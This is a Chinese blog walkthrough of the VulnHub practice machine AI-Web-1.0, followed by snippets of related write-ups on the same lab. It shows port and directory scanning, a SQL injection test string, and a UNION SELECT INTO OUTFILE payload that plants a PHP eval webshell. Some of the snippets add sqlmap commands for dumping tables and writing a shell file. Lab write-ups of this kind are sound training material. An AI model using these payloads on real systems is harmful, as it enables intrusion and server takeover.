AI-Web-1.0通关攻略

最新推荐文章于 2024-09-27 12:05:02 发布
最新推荐文章于 2024-09-27 12:05:02 发布
阅读量321 收藏 1
点赞数 4
文章标签: linux 网络 运维
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/han14735828432/article/details/141334404
版权

用nmap扫ip的端口,发现只有80端口用dirb扫描发现有robots.txt文件,我们发现robots.txt中有标明目录,我们再去尝试一一访问。

尝试访问/se3reTdir777/目录,出现一个提交框。

sql注入

输入1' or1=1 #,显示正常,存在注入。采取手工注入方式获得用户名和密码。

用dirsearch发现有php探针文件,我们访问它。

找到绝对路径并写入一句话木马文件。

在运行框输入

-1' union select 1,2,'<?php @eval($_POST[cmd]);?>' into outfile "/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/11.php"  #

写入成功后打开蚁剑。

han_韩
关注
vulnhub靶机AI-WEB-1.0渗透测试
Long_gone的博客
09-29 1651
首先用netdiscover工具扫描一下靶机IP: netdiscover 由经验推断出靶机IP为:192.168.34.228,接着使用nmap工具扫描一下靶机端口的开放情况: nmap -sV -p 0-65535 192.168.34.228 发现靶机只开放了80端口,然后访问一下看看: 然后试一下目录爆破: dirb http://192.168.34.228 发现robot...
靶机通关|AI-WEB-1.0 靶机通关攻略
a96482的博客
07-30 752
python3 sqlmap.py -r '/home/kali/桌面/2.txt' --file-write --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/hack.php。python3 sqlmap.py -r '/home/kali/桌面/2.txt'--batch -D aiweb1 -T systemUser --dump。中发现提交框,开始尝试注入。写入成功,使用蚁剑连接。连接成功,通关完成。
VulnHub_AI_Web_1.0
qq_45434762的博客
03-28 274
一个粗糙的信息收集 使用nmap探测目标主机开放端口 访问robots.txt 访问http://192.168.31.126/se3reTdir777/ 猜测可能存在注入点,使用Sqlmap进行探测 sqlmap -u "http://192.168.126.137/se3reTdir777/" --data "uid=1&Operation=Submit" --dbs 获取数...
AI-WEB-1.0简单攻略
在Web和Reverse坑里游泳中。。。。
07-17 2745
AI-WEB-1.0靶机的简单攻略
AI-WEB-1.0详细教程
2301_76631050的博客
07-29 400
这里2.php存放在/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/下。Ctrl+f 搜索一下/m3diNf0/,发现了路径:/home/www/html/web1x443290o2sdf92213/我们需要一个可以上传文件的页面se3reTdir777/uploads/刚好符合 它的绝对目录为。我们接下来的思路是写入木马,但是需要一个可写入路径需要我们找一下。上面我们扫到的目录有好几个不能访问,我们需要深入对他们扫描一下。
AI-WEB-1.0
底层社会中的弱智
08-03 642
总结: 报错注入常见的十种,本次用的是updatexml 获取os-sh的条件,具有可写权限的绝对路径需要自己拼接 使用openssl passwd -1 salt xxx xxx构造hash 目标主机为192.168.49.158 攻击kali机为192.168.49.129 前期的信息收集,端口服务,目录扫描,web框架等 端口服务: 只开放80端口且存在两个目录 访问web页面,使用nikto和dirb针对主机和目录进行探测: 主页和前端源码没有提供信息 查看下目录
AI-WEB-1.0超详细多方法教程
qq_61988806的博客
10-19 3124
AI-WEB-1.0 多方法渗透
AI WEB 1.0靶场渗透思路
weixin_69010236的博客
07-25 578
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
云尘-AI-Web-1.0
m0_64180167的博客
10-31 249
继续!开扫继续先测试websql注入 直接sqlmap跑通过注入 (sqlmap查询方式省略)存在systemuser 不知道会不会是电脑的密码 我们解密一下然后直接试试看然后失败 这里就没有思路了 但是我们刚刚存在一个目录 我们再扫扫看无果 换另一个目录扫出来了 /m3diNf0/info.php 去看看这下就开朗了因为这里可以获取 绝对路径 那么我们就可以直接通过 sqlmap进行getshell 这里介绍三种。
vulnhub靶机AI-Web-1.0渗透笔记
weixin_52125240的博客
07-14 1620
vulnhub靶机AI-Web-1.0渗透笔记
vulnhub靶机AI-Web-1.0小白渗透学习笔记
qq_45885854的博客
06-12 335
vulnhub靶机AI-Web-1.0小白基础渗透学习,主要学习渗透思维,常见工具的使用sqlmap、dirb、python提权,修改用户名等
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6679
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
Vulnhub靶机:AI-WEB-1.0
weixin_68416970的博客
05-22 1135
Vulnhub靶机:AI-WEB-1.0AI-WEB-1.0是一个专门设计用来测试渗透测试者技能的靶机。这个靶机的目标是从/root/flag.txt获取flag,获得低权限的shell,然后将权限提升到root。
AI-WEB-1.0靶机渗透教程 文件上传漏洞
qq_48368964的博客
07-29 238
简单的扫描目录 扫出来两个 分别进去看看发现里面有两个接着扫描下第一个目录 发现了info.php文件。
Vulnhub-Al-Web-1.0 靶机复现完整过程
Continuejww的博客
12-28 1471
在刚才信息收集中我们在robots.txt文件中发现了一个/se3reTdir777/uploads/的路径,并且也读到过phpinfo信息,从info.php文件中我们知道了根目录的路径,那现在就可以在uploads/路径下上传文件,通过sqlmap进行写入一个木马文件。(最明显的位置,最重要的文件,具有读写权限,一般基本可以止于此步骤,因为之前已经拿到了webshell了,直接将信息写入到此文件中)访问此目录,发现页面显示的是PHP有关信息,并且可以看到当前权限用户是最低级的和网站的根目录。
AI-Web-1.0教程
a666666688的博客
07-27 454
靶机安装启动靶机开启kali。
Linux 安装redis主从模式+哨兵模式3台节点
最新发布
一千个读者就有一千个哈姆雷特
09-27 284
Linux 安装redis主从模式+哨兵模式3台节点
linux】gcc makefile
Quietcoder的博客
09-24 1076
在静态链接中,链接器(如GNU的。
hcia-intelligent computing v1.0 实验手册
01-17
hcia-intelligent computing v1.0 实验手册是华为公司针对人工智能计算领域的培训教材。该手册主要包括人工智能基础知识、数据处理、模型训练与部署等内容,旨在帮助学习者了解人工智能的基本概念和技术,并掌握相关实验操作与应用技能。 实验手册首先介绍了人工智能的基本概念和发展历程,阐述了人工智能在各个领域的应用现状和未来趋势。然后对数据处理技术进行了详细的讲解,包括数据采集、清洗、特征提取等操作,培养学习者对数据分析的能力。接着介绍了常用的机器学习算法和深度学习框架,包括神经网络搭建、模型训练与调优等内容,帮助学习者掌握模型设计与优化的方法。最后,实验手册还包括了模型部署与应用的操作指南,帮助学习者将所学知识应用到实际场景中。 在实验手册中,华为公司提供了丰富的案例分析和实例操作,通过实际的数据处理和模型训练实验,帮助学习者深入理解人工智能技术的应用和意义。同时,实验手册还提供了丰富的练习题和实验报告模板,帮助学习者系统地总结所学知识,提升自己的实践能力。 总之,hcia-intelligent computing v1.0 实验手册是一份全面系统的人工智能培训教材,对于想要深入学习人工智能计算领域的读者来说,是一份非常有价值的参考资料。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值